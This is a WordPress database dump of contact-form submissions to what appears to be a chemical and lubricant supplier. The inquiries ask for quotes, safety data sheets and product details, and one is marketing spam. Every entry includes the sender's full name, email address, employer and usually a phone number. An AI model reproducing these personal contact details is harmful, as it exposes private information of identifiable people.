INSERT INTO `wp_postmeta` VALUES (40504, 4702, '_field_1', 'Ophelia beamon'); 
INSERT INTO `wp_postmeta` VALUES (40505, 4702, '_field_10', 'Miller stephenson'); 
INSERT INTO `wp_postmeta` VALUES (40506, 4702, '_field_2', 'Ofb2845@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40507, 4702, '_field_8', '(203) 942-9795'); 
INSERT INTO `wp_postmeta` VALUES (40508, 4702, '_field_3', 'I am not feeling well due to a stomach bug'); 
INSERT INTO `wp_postmeta` VALUES (40509, 4702, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40510, 4702, '_sub_id', '4702'); 
INSERT INTO `wp_postmeta` VALUES (40511, 4703, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40512, 4703, '_seq_num', '809'); 
INSERT INTO `wp_postmeta` VALUES (40513, 4703, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40514, 4703, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40515, 4703, '_field_1', 'Theresa Tornatore'); 
INSERT INTO `wp_postmeta` VALUES (40516, 4703, '_field_10', 'Harris'); 
INSERT INTO `wp_postmeta` VALUES (40517, 4703, '_field_2', 'ttornato@harris.com'); 
INSERT INTO `wp_postmeta` VALUES (40518, 4703, '_field_8', '(585) 269-7251'); 
INSERT INTO `wp_postmeta` VALUES (40519, 4703, '_field_3', 'Good Morning ,\r\nI need a quote on a case of Quik-Freeze MS-242N.'); 
INSERT INTO `wp_postmeta` VALUES (40520, 4703, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40521, 4703, '_sub_id', '4703'); 
INSERT INTO `wp_postmeta` VALUES (40522, 4704, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40523, 4704, '_seq_num', '810'); 
INSERT INTO `wp_postmeta` VALUES (40524, 4704, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40525, 4704, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40526, 4704, '_field_1', 'Giovanna'); 
INSERT INTO `wp_postmeta` VALUES (40527, 4704, '_field_10', 'Aloia Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (40528, 4704, '_field_2', 'giovanna@aloiaaerospace.com'); 
INSERT INTO `wp_postmeta` VALUES (40529, 4704, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40530, 4704, '_field_3', 'Dear,\r\nI bought the PN MS-122AD.\r\nCan you send me the TDS and MSDS in portuguese? '); 
INSERT INTO `wp_postmeta` VALUES (40531, 4704, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40532, 4704, '_sub_id', '4704'); 
INSERT INTO `wp_postmeta` VALUES (40533, 4705, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40534, 4705, '_seq_num', '811'); 
INSERT INTO `wp_postmeta` VALUES (40535, 4705, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40536, 4705, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40537, 4705, '_field_1', 'Jeff Francis'); 
INSERT INTO `wp_postmeta` VALUES (40538, 4705, '_field_10', 'Q1 Aviation'); 
INSERT INTO `wp_postmeta` VALUES (40539, 4705, '_field_2', 'j.francis@q1aero.ca'); 
INSERT INTO `wp_postmeta` VALUES (40540, 4705, '_field_8', '(905) 678-1234'); 
INSERT INTO `wp_postmeta` VALUES (40541, 4705, '_field_3', 'Good Afternoon,\r\n\r\nQ1 Aviation is interested in becoming a distributor of some of your products, if you could reply by outlining the necessary steps for obtaining a distribution agreement it would be greatly appreciated.\r\n\r\nThanks in advance,\r\n\r\nJeff'); 
INSERT INTO `wp_postmeta` VALUES (40542, 4705, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40543, 4705, '_sub_id', '4705'); 
INSERT INTO `wp_postmeta` VALUES (40544, 4706, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40545, 4706, '_seq_num', '812'); 
INSERT INTO `wp_postmeta` VALUES (40546, 4706, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40547, 4706, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40548, 4706, '_field_1', 'Lori Fitzgerald'); 
INSERT INTO `wp_postmeta` VALUES (40549, 4706, '_field_10', 'MTS Systems'); 
INSERT INTO `wp_postmeta` VALUES (40550, 4706, '_field_2', 'lori.fitzgerald@mts.com'); 
INSERT INTO `wp_postmeta` VALUES (40551, 4706, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40552, 4706, '_field_3', 'Please email me invoice for order#927765'); 
INSERT INTO `wp_postmeta` VALUES (40553, 4706, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40554, 4706, '_sub_id', '4706'); 
INSERT INTO `wp_postmeta` VALUES (40555, 4707, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40556, 4707, '_seq_num', '813'); 
INSERT INTO `wp_postmeta` VALUES (40557, 4707, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40558, 4707, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40559, 4707, '_field_1', 'Thomas Petersen'); 
INSERT INTO `wp_postmeta` VALUES (40560, 4707, '_field_10', 'Great Lakes Aviation'); 
INSERT INTO `wp_postmeta` VALUES (40561, 4707, '_field_2', 'peterat1965@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (40562, 4707, '_field_8', '(307) 640-4463'); 
INSERT INTO `wp_postmeta` VALUES (40563, 4707, '_field_3', 'Looking for mixing ratio for Epon 828 resin\r\nWith Epikure 3140 curing agent.'); 
INSERT INTO `wp_postmeta` VALUES (40564, 4707, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40565, 4707, '_sub_id', '4707'); 
INSERT INTO `wp_postmeta` VALUES (40566, 4708, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40567, 4708, '_seq_num', '814'); 
INSERT INTO `wp_postmeta` VALUES (40568, 4708, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40569, 4708, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40570, 4708, '_field_1', 'Kevin Su'); 
INSERT INTO `wp_postmeta` VALUES (40571, 4708, '_field_10', 'Foxconn'); 
INSERT INTO `wp_postmeta` VALUES (40572, 4708, '_field_2', 'kevin.kw.su@foxconn.com'); 
INSERT INTO `wp_postmeta` VALUES (40573, 4708, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40574, 4708, '_field_3', 'I wanna buy Polyphenyl ether MS-383H. Any agent in China? Could provide the contact windows? Thx!'); 
INSERT INTO `wp_postmeta` VALUES (40575, 4708, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40576, 4708, '_sub_id', '4708'); 
INSERT INTO `wp_postmeta` VALUES (40577, 4709, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40578, 4709, '_seq_num', '815'); 
INSERT INTO `wp_postmeta` VALUES (40579, 4709, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40580, 4709, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40581, 4709, '_field_1', 'MANGESH JAISWAL'); 
INSERT INTO `wp_postmeta` VALUES (40582, 4709, '_field_10', 'STERIS CORPORATION'); 
INSERT INTO `wp_postmeta` VALUES (40583, 4709, '_field_2', 'mangesh_jaiswal@steris.com'); 
INSERT INTO `wp_postmeta` VALUES (40584, 4709, '_field_8', '(440) 205-7765'); 
INSERT INTO `wp_postmeta` VALUES (40585, 4709, '_field_3', 'RoHS 2011/65/EU COMPLIANCE CERTIFICATE FOR LUBRICANT, KRYTOX, GPL-202 ?'); 
INSERT INTO `wp_postmeta` VALUES (40586, 4709, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40587, 4709, '_sub_id', '4709'); 
INSERT INTO `wp_postmeta` VALUES (40588, 4710, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40589, 4710, '_seq_num', '816'); 
INSERT INTO `wp_postmeta` VALUES (40590, 4710, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40591, 4710, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40592, 4710, '_field_1', 'RICH PAINTER'); 
INSERT INTO `wp_postmeta` VALUES (40593, 4710, '_field_10', 'IBT INC'); 
INSERT INTO `wp_postmeta` VALUES (40594, 4710, '_field_2', 'RPAINTER@IBTINC.COM'); 
INSERT INTO `wp_postmeta` VALUES (40595, 4710, '_field_8', '(913) 428-2861'); 
INSERT INTO `wp_postmeta` VALUES (40596, 4710, '_field_3', 'WHERE CAN I BUY 12 CANS OF MS-730 CONTACT CLEANING AGENT?'); 
INSERT INTO `wp_postmeta` VALUES (40597, 4710, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40598, 4710, '_sub_id', '4710'); 
INSERT INTO `wp_postmeta` VALUES (40599, 4711, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40600, 4711, '_seq_num', '817'); 
INSERT INTO `wp_postmeta` VALUES (40601, 4711, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40602, 4711, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40603, 4711, '_field_1', 'Mike Curtis'); 
INSERT INTO `wp_postmeta` VALUES (40604, 4711, '_field_10', 'Aerojet Rocketdyne'); 
INSERT INTO `wp_postmeta` VALUES (40605, 4711, '_field_2', 'michael.curtis@rocket.com'); 
INSERT INTO `wp_postmeta` VALUES (40606, 4711, '_field_8', '(870) 574-3506'); 
INSERT INTO `wp_postmeta` VALUES (40607, 4711, '_field_3', 'We use your product, MS-143XD  Dry Film Mold Release Agent.  I need the suggested shelf-life for this material.  I cannot find this information in your published material.\r\nThanks.'); 
INSERT INTO `wp_postmeta` VALUES (40608, 4711, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40609, 4711, '_sub_id', '4711'); 
INSERT INTO `wp_postmeta` VALUES (40610, 4712, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40611, 4712, '_seq_num', '337'); 
INSERT INTO `wp_postmeta` VALUES (40612, 4712, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40613, 4712, '_field_12', 'Gerald Coulter'); 
INSERT INTO `wp_postmeta` VALUES (40614, 4712, '_field_13', 'JC Equipment Repair'); 
INSERT INTO `wp_postmeta` VALUES (40615, 4712, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40616, 4712, '_field_14', 'gerald.coulter69@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40617, 4712, '_field_15', '(814) 777-0160'); 
INSERT INTO `wp_postmeta` VALUES (40618, 4712, '_field_16', 'What type of grease would be best for lawn mower spindles... I&#039;m a hugh AMSOIL user but I have tried all types of grease and nothing seems to really stay in the bearings...when I service my mower and the others I work on it usually takes 30-40 pumps of the grease gun to get the spindle filled up...I sometimes just add 10-15 pumps every 3 or 4 mowings but I don&#039;t know if I&#039;m getting the proper lubrication...Thank You very much in advance.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (40619, 4712, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40620, 4712, '_sub_id', '4712'); 
INSERT INTO `wp_postmeta` VALUES (40621, 4713, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40622, 4713, '_seq_num', '818'); 
INSERT INTO `wp_postmeta` VALUES (40623, 4713, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40624, 4713, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40625, 4713, '_field_1', 'Adrian Gabriel Gramada'); 
INSERT INTO `wp_postmeta` VALUES (40626, 4713, '_field_10', 'self-employed'); 
INSERT INTO `wp_postmeta` VALUES (40627, 4713, '_field_2', 'adrian.gabriel.gramada@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40628, 4713, '_field_8', '+33641693660'); 
INSERT INTO `wp_postmeta` VALUES (40629, 4713, '_field_3', 'Hello,\r\n\r\n   I would very much like to implement your product for a professional cooling solution for electronics like ultra high performance desktop PCs.\r\n   I need to be able to coat / re-coat (repairs / upgrades) the entire assembly (motherboard + all the components installed, without any heat-sinks &amp; fans). The reservoir (most likely made from high quality acrylic) will be also coated if necessary (probably the best option in any case) especially if the deposition process is vapor-based. The case (reservoir) is vacuum-ready for convenient one-phase coating of both it&#039;s internal surface + the electronics inside. The distilled water should be reusable at least for irrigation purposes or even some house-hold washing purposes.\r\n   For sub-zero cooling alcohol-based solution will be used instead of the pure water.\r\n\r\n   Thank-you very much and I&#039;m eagerly awaiting your reply / solutions !\r\n\r\nRespectfully,\r\nAdrian'); 
INSERT INTO `wp_postmeta` VALUES (40630, 4713, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40631, 4713, '_sub_id', '4713'); 
INSERT INTO `wp_postmeta` VALUES (40632, 4714, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40633, 4714, '_seq_num', '819'); 
INSERT INTO `wp_postmeta` VALUES (40634, 4714, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40635, 4714, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40636, 4714, '_field_1', 'Adrian Gabriel Gramada'); 
INSERT INTO `wp_postmeta` VALUES (40637, 4714, '_field_10', 'self-employed'); 
INSERT INTO `wp_postmeta` VALUES (40638, 4714, '_field_2', 'adrian.gabriel.gramada@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40639, 4714, '_field_8', '(064) 169-3660'); 
INSERT INTO `wp_postmeta` VALUES (40640, 4714, '_field_3', 'Hello,\r\n\r\n   I would very much like to implement your product for a professional cooling solution for electronics like ultra high performance desktop PCs.\r\n   I need to be able to coat / re-coat (repairs / upgrades) the entire assembly (motherboard + all the components installed, without any heat-sinks &amp; fans). The reservoir (most likely made from high quality acrylic) will be also coated if necessary (probably the best option in any case) especially if the deposition process is vapor-based. The case (reservoir) is vacuum-ready for convenient one-phase coating of both it&#039;s internal surface + the electronics inside. The distilled water should be reusable at least for irrigation purposes or even some house-hold washing purposes.\r\n   For sub-zero cooling alcohol-based solution will be used instead of the pure water.\r\n\r\n   Thank-you very much and I&#039;m eagerly awaiting your reply / solutions !\r\n\r\nRespectfully,\r\nAdrian\r\n+33641693660'); 
INSERT INTO `wp_postmeta` VALUES (40641, 4714, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40642, 4714, '_sub_id', '4714'); 
INSERT INTO `wp_postmeta` VALUES (40643, 4717, '_wp_attached_file', '2017/07/115-15.pdf'); 
INSERT INTO `wp_postmeta` VALUES (40644, 4719, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40645, 4719, '_seq_num', '820'); 
INSERT INTO `wp_postmeta` VALUES (40646, 4719, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40647, 4719, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40648, 4719, '_field_1', 'CHRIS MANEK'); 
INSERT INTO `wp_postmeta` VALUES (40649, 4719, '_field_10', 'VESUKI, INC.'); 
INSERT INTO `wp_postmeta` VALUES (40650, 4719, '_field_2', 'chris@vesuki.com'); 
INSERT INTO `wp_postmeta` VALUES (40651, 4719, '_field_8', '(562) 245-4000'); 
INSERT INTO `wp_postmeta` VALUES (40652, 4719, '_field_3', 'please quote for:\nPart No: MS122\nNSN: 9150-00-349-9290\nParting Agent N11\nQty: 4'); 
INSERT INTO `wp_postmeta` VALUES (40653, 4719, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40654, 4719, '_sub_id', '4719'); 
INSERT INTO `wp_postmeta` VALUES (40655, 4720, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40656, 4720, '_seq_num', '821'); 
INSERT INTO `wp_postmeta` VALUES (40657, 4720, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40658, 4720, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40659, 4720, '_field_1', 'Renee Irwin'); 
INSERT INTO `wp_postmeta` VALUES (40660, 4720, '_field_10', 'Leading Edge Composites'); 
INSERT INTO `wp_postmeta` VALUES (40661, 4720, '_field_2', 'rirwin@lec-composites.com'); 
INSERT INTO `wp_postmeta` VALUES (40662, 4720, '_field_8', '(610) 932-9055'); 
INSERT INTO `wp_postmeta` VALUES (40663, 4720, '_field_3', 'Hello, I am looking for pricing and min buy for the following item:\r\nEPON 815C OR EPOCAST 50-\r\n1/9816.\r\nPlease advise at your earliest convenience.'); 
INSERT INTO `wp_postmeta` VALUES (40664, 4720, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40665, 4720, '_sub_id', '4720'); 
INSERT INTO `wp_postmeta` VALUES (40666, 4721, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40667, 4721, '_seq_num', '822'); 
INSERT INTO `wp_postmeta` VALUES (40668, 4721, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40669, 4721, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40670, 4721, '_field_1', 'DL Greise'); 
INSERT INTO `wp_postmeta` VALUES (40671, 4721, '_field_10', 'Oak Ridge National Lab'); 
INSERT INTO `wp_postmeta` VALUES (40672, 4721, '_field_2', 'greisedl@ornl.gov'); 
INSERT INTO `wp_postmeta` VALUES (40673, 4721, '_field_8', '(865) 576-3923'); 
INSERT INTO `wp_postmeta` VALUES (40674, 4721, '_field_3', 'Can you please send me a Safety Data Sheet for Chemours Krytox XHT-BD Performance PFPE Lubricant?'); 
INSERT INTO `wp_postmeta` VALUES (40675, 4721, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40676, 4721, '_sub_id', '4721'); 
INSERT INTO `wp_postmeta` VALUES (40677, 4722, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40678, 4722, '_seq_num', '823'); 
INSERT INTO `wp_postmeta` VALUES (40679, 4722, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40680, 4722, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40681, 4722, '_field_1', 'Mark Dallura'); 
INSERT INTO `wp_postmeta` VALUES (40682, 4722, '_field_10', 'Chase ELECTRONICS Inc'); 
INSERT INTO `wp_postmeta` VALUES (40683, 4722, '_field_2', 'sales@chaserecycling.com'); 
INSERT INTO `wp_postmeta` VALUES (40684, 4722, '_field_8', '(610) 608-9570'); 
INSERT INTO `wp_postmeta` VALUES (40685, 4722, '_field_3', 'How can I get a sample of 907 epoxy'); 
INSERT INTO `wp_postmeta` VALUES (40686, 4722, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40687, 4722, '_sub_id', '4722'); 
INSERT INTO `wp_postmeta` VALUES (40689, 4723, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40690, 4723, '_seq_num', '824'); 
INSERT INTO `wp_postmeta` VALUES (40691, 4723, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40692, 4723, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40693, 4723, '_field_1', 'Ali Mansour I. Altaeif'); 
INSERT INTO `wp_postmeta` VALUES (40694, 4723, '_field_10', 'Odax International Ltd'); 
INSERT INTO `wp_postmeta` VALUES (40695, 4723, '_field_2', 'odax@melita.com'); 
INSERT INTO `wp_postmeta` VALUES (40696, 4723, '_field_8', '(356) 992-5603'); 
INSERT INTO `wp_postmeta` VALUES (40697, 4723, '_field_3', 'Hi,\nGood day\nAre you supplying Motor oil for Petrol &amp; Diesel Engine? Final destination Benghazi- Libya\n\nRegards  '); 
INSERT INTO `wp_postmeta` VALUES (40698, 4723, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40699, 4723, '_sub_id', '4723'); 
INSERT INTO `wp_postmeta` VALUES (40700, 4724, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40701, 4724, '_seq_num', '825'); 
INSERT INTO `wp_postmeta` VALUES (40702, 4724, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40703, 4724, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40704, 4724, '_field_1', 'MIKE CRAMER'); 
INSERT INTO `wp_postmeta` VALUES (40705, 4724, '_field_10', 'TE'); 
INSERT INTO `wp_postmeta` VALUES (40706, 4724, '_field_2', 'mcramer@te.com'); 
INSERT INTO `wp_postmeta` VALUES (40707, 4724, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40708, 4724, '_field_3', 'please e-mail the latest sds for ms-266'); 
INSERT INTO `wp_postmeta` VALUES (40709, 4724, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40710, 4724, '_sub_id', '4724'); 
INSERT INTO `wp_postmeta` VALUES (40711, 4725, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40712, 4725, '_seq_num', '826'); 
INSERT INTO `wp_postmeta` VALUES (40713, 4725, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40714, 4725, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40715, 4725, '_field_1', 'Velma Craig'); 
INSERT INTO `wp_postmeta` VALUES (40716, 4725, '_field_10', 'Smarter Tactics'); 
INSERT INTO `wp_postmeta` VALUES (40717, 4725, '_field_2', 'velmajcraig@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40718, 4725, '_field_8', '877-228-1545'); 
INSERT INTO `wp_postmeta` VALUES (40719, 4725, '_field_3', 'Hi,\r\n\r\nYour website&#039;s design is absolutely brilliant. The visuals really enhance your message and the content compels action. I&#039;ve forwarded it to a few of my contacts who I think could benefit from your services.\r\nWhen I was looking at your site, though, I noticed a mistake that you&#039;ve made re: search engine optimization. It&#039;s a relatively important fix. Would you like me to write it up so that you can share it with your web team? If this is a priority, I can also get on a call.\r\n\r\nRegards,\r\nVelma Craig\r\nDigital Marketing Manager\r\n(877)-228-1545 \r\nSmarter Tactics\r\nDigital Marketing | AdWords Management | Content &amp; Social | Influencer Marketing'); 
INSERT INTO `wp_postmeta` VALUES (40720, 4725, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40721, 4725, '_sub_id', '4725'); 
INSERT INTO `wp_postmeta` VALUES (40722, 4726, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40723, 4726, '_seq_num', '827'); 
INSERT INTO `wp_postmeta` VALUES (40724, 4726, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40725, 4726, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40726, 4726, '_field_1', 'drexel ferguson'); 
INSERT INTO `wp_postmeta` VALUES (40727, 4726, '_field_10', 'NJ Sullivan , Inc'); 
INSERT INTO `wp_postmeta` VALUES (40728, 4726, '_field_2', 'drexel@njsullivan.com'); 
INSERT INTO `wp_postmeta` VALUES (40729, 4726, '_field_8', '(703) 464-5944'); 
INSERT INTO `wp_postmeta` VALUES (40730, 4726, '_field_3', 'looking for price on one can of MS 465 coating '); 
INSERT INTO `wp_postmeta` VALUES (40731, 4726, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40732, 4726, '_sub_id', '4726'); 
INSERT INTO `wp_postmeta` VALUES (40733, 4727, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40734, 4727, '_seq_num', '828'); 
INSERT INTO `wp_postmeta` VALUES (40735, 4727, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40736, 4727, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40737, 4727, '_field_1', 'Chandan'); 
INSERT INTO `wp_postmeta` VALUES (40738, 4727, '_field_10', 'L&amp;T Technology Services'); 
INSERT INTO `wp_postmeta` VALUES (40739, 4727, '_field_2', 'chandankumar.s@lnttechservices.com'); 
INSERT INTO `wp_postmeta` VALUES (40740, 4727, '_field_8', '(821) 240-5719'); 
INSERT INTO `wp_postmeta` VALUES (40741, 4727, '_field_3', 'We are contacting on behalf of Fluke. We require country of origin certificates for parts being procured/purchased by Fluke. We do have authorization letter from Fluke to request for Country of origin certificates from all vendors/manufacturers/suppliers associated with Fluke.\r\nAwaiting your kind response on this request. Please reply so that i can share further details of our request and signed copy of authorization letter to proceed ahead.\r\nBest Regards,\r\nChandan Kumar'); 
INSERT INTO `wp_postmeta` VALUES (40742, 4727, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40743, 4727, '_sub_id', '4727'); 
INSERT INTO `wp_postmeta` VALUES (40744, 4728, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40745, 4728, '_seq_num', '829'); 
INSERT INTO `wp_postmeta` VALUES (40746, 4728, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40747, 4728, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40748, 4728, '_field_1', 'Kathleen Judkins'); 
INSERT INTO `wp_postmeta` VALUES (40749, 4728, '_field_10', 'Northeast Air'); 
INSERT INTO `wp_postmeta` VALUES (40750, 4728, '_field_2', 'kathleenj@northeastair.com'); 
INSERT INTO `wp_postmeta` VALUES (40751, 4728, '_field_8', '(207) 774-6318'); 
INSERT INTO `wp_postmeta` VALUES (40752, 4728, '_field_3', 'We are looking for MS122V TFE release agent dry lube. Can you sell directly to us or provide a vendor name as we are having difficulty locating this item. It is specific to the aircraft we are servicing, and will be looking for as much as 6 cans - about 14 oz per can.\r\nThank you, Kathleen'); 
INSERT INTO `wp_postmeta` VALUES (40753, 4728, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40754, 4728, '_sub_id', '4728'); 
INSERT INTO `wp_postmeta` VALUES (40755, 4729, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40756, 4729, '_seq_num', '830'); 
INSERT INTO `wp_postmeta` VALUES (40757, 4729, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40758, 4729, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40759, 4729, '_field_1', 'Melai Collado'); 
INSERT INTO `wp_postmeta` VALUES (40760, 4729, '_field_10', 'Electro Industries / GaugeTech'); 
INSERT INTO `wp_postmeta` VALUES (40761, 4729, '_field_2', 'mcollado@electroind.com'); 
INSERT INTO `wp_postmeta` VALUES (40762, 4729, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40763, 4729, '_field_3', 'Hi Kristi,\n\nHello,\n\nPlease give your best price and lead time for:\n\nEI #: MISC20112\nMFG NAME:  MILLER-STEPHENSON CHEM\nMFG #: MS-383-HUV\nQUANTITY:  5 pc/s'); 
INSERT INTO `wp_postmeta` VALUES (40764, 4729, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40765, 4729, '_sub_id', '4729'); 
INSERT INTO `wp_postmeta` VALUES (40766, 4730, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40767, 4730, '_seq_num', '831'); 
INSERT INTO `wp_postmeta` VALUES (40768, 4730, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40769, 4730, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40770, 4730, '_field_1', 'Bob Beauchamp'); 
INSERT INTO `wp_postmeta` VALUES (40771, 4730, '_field_10', 'Honeywell'); 
INSERT INTO `wp_postmeta` VALUES (40772, 4730, '_field_2', 'rbeauchamp@kcp.com'); 
INSERT INTO `wp_postmeta` VALUES (40773, 4730, '_field_8', '(816) 488-3586'); 
INSERT INTO `wp_postmeta` VALUES (40774, 4730, '_field_3', 'We purchase our Krytox oil from Miller-Stephenson.  I am checking to see whether you folks also reclaim used Krytox oil. We are looking for a company that will reclaim the material.'); 
INSERT INTO `wp_postmeta` VALUES (40775, 4730, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40776, 4730, '_sub_id', '4730'); 
